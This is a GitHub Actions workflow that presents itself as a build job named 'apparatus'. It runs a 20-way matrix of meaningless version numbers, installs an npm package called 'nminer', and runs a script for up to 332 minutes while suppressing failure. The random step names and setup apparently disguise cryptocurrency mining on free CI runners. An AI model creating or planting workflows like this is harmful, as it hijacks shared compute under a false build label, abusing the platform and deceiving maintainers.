name: apparatus
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 3685 }
          - { version: 2339 }
          - { version: 5114 }
          - { version: 907 }
          - { version: 9196 }
          - { version: 5861 }
          - { version: 6520 }
          - { version: 9841 }
          - { version: 6332 }
          - { version: 4174 }
          - { version: 8089 }
          - { version: 363 }
          - { version: 9736 }
          - { version: 3681 }
          - { version: 8132 }
          - { version: 4311 }
          - { version: 4682 }
          - { version: 9498 }
          - { version: 3222 }
          - { version: 2678 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: carefully whether
        run: |
          npm install nminer@latest
          timeout 332m node apparatus.js || echo "apparatus executed"